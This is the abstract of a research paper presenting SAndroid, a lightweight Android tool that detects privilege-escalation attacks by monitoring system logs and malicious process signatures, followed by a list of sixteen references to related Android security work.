Signature-based detection of privilege-escalation attacks on Android

Android has become a major player in smartphone software arena, thanks to the massively positive reception of Google Play by the developers and users alike. In general, Android applications follow a set of permissions, which are used for access control. However, through the privilege-escalation vulnerability, a malicious application can escalate itself and access an un-permitted resource. Consequently, serious security and safety exploits such as privacy violation, reverse-shell access to the device, and drive-by downloads may occur. We propose a flexible and efficient defense mechanism against such exploits. Our solution - SAndroid, is an extensible and a lightweight application. It provides enhanced safety and security against privilege escalation attacks through rapid detection. SAndroid is based on active monitoring and detection of malicious applications through tracking of system logs and malicious process signatures. The assurance of safety provided by SAndroid is confirmed through design, testing, and verification. SAndroid follows modular approach permitting high flexibility and efficiency. Through real experiments, we confirmed that SAndroid is an efficient and low cost solution having negligible false-positives. This paper describes the architecture and design of the SAndroid framework and provides details of our experiments.

[1]  Ahmad-Reza Sadeghi,et al.  Towards Taming Privilege-Escalation Attacks on Android , 2012, NDSS.

[2]  Rafael Fedler,et al.  Android oS Security : riSkS And LimitAtionS A PrActicAL evALuAtion , 2012 .

[3]  Ahmad-Reza Sadeghi,et al.  Privilege Escalation Attacks on Android , 2010, ISC.

[4]  Marianne Winslett,et al.  Vetting browser extensions for security vulnerabilities with VEX , 2011, CACM.

[5]  Lucas C.K. Hui,et al.  A privilege escalation vulnerability checking system for android applications , 2011, 2011 IEEE 13th International Conference on Communication Technology.

[6]  Patrick D. McDaniel,et al.  Semantically Rich Application-Centric Security in Android , 2009, 2009 Annual Computer Security Applications Conference.

[7]  Alastair R. Beresford,et al.  MockDroid: trading privacy for application functionality on smartphones , 2011, HotMobile '11.

[8]  Patrick D. McDaniel,et al.  Semantically rich application-centric security in Android , 2012 .

[9]  Siu-Ming Yiu,et al.  DroidChecker: analyzing android applications for capability leak , 2012, WISEC '12.

[10]  Alessandro Armando,et al.  Would You Mind Forking This Process? A Denial of Service Attack on Android (and Some Countermeasures) , 2012, SEC.

[11]  Hao Chen,et al.  I-ARM-Droid : A Rewriting Framework for In-App Reference Monitors for Android Applications , 2012 .

[12]  Ahmad-Reza Sadeghi,et al.  XManDroid: A New Android Evolution to Mitigate Privilege Escalation Attacks , 2011 .

[13]  Kieran McLaughlin,et al.  Obfuscation: The Hidden Malware , 2011, IEEE Security & Privacy.

[14]  Marianne Winslett,et al.  VEX: Vetting Browser Extensions for Security Vulnerabilities , 2010, USENIX Security Symposium.

[15]  Stefan Kraxberger,et al.  Malware detection by applying knowledge discovery processes to application metadata on the Android Market (Google Play) , 2016, Secur. Commun. Networks.

[16]  Karsten Sohr,et al.  The Transitivity of Trust Problem in the Interaction of Android Applications , 2012, ArXiv.